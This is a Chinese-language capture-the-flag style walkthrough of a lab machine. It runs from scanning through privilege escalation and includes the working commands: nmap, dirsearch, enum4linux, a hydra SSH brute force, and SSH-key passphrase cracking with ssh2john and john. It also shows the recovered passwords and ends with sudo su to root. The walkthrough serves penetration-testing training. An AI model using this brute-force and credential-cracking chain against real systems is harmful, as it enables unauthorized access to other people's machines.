一、信息收集
1、主机发现
nmap 192.168.236.0/24
2、端口扫描
使用nmap端口扫描发现靶机开放端口:22、80、139、445、8009、8080
nmap 192.168.236.162 -p- -A
3、目录扫描
发现 /development 目录
dirsearch -u http://192.168.236.162
二、漏洞探测
步骤一:访问 80 端口,拼接访问 /development
步骤二:访问发现提示信息
J用户一直在审核 /etc/shadow 的内容
K用户的密码是弱口令
步骤三:靶机开放了445端口,可以使用enum4linux工具枚举smb服务的信息,发现两个用户 kay,jan
enum4linux -a -o 192.168.236.162
三、GetShell
步骤一:使用hydra爆破jan用户的密码
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://192.168.236.162:22 -t 64
jan:armando
步骤二:ssh 登录
四、提权
步骤一:没有发现存在特权的命令,翻看文件,发现 /home/kay 目录存在 pass.bak 文件,但是没有访问权限
步骤二:我们可以访问 kay 用户的ssh私钥文件,将私钥文件复制到本地,设置权限并尝试登录,需要密码
chmod 600 id_rsa
ssh -i id_rsa kay@192.168.236.162
步骤三:通过ssh2john转换id_rsa为可以识别的信息,然后利用字典解密该信息,来获取文件密码 beeswax
ssh2john id_rsa > passwd.txt
john --wordlist=/usr/share/wordlists/rockyou.txt passwd.txt
步骤四:登录ssh,查看pass.bak文件,可能是kay用户的密码
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
步骤五:sudo -l 查看命令,sudo su 成功提权
步骤六:查看 flag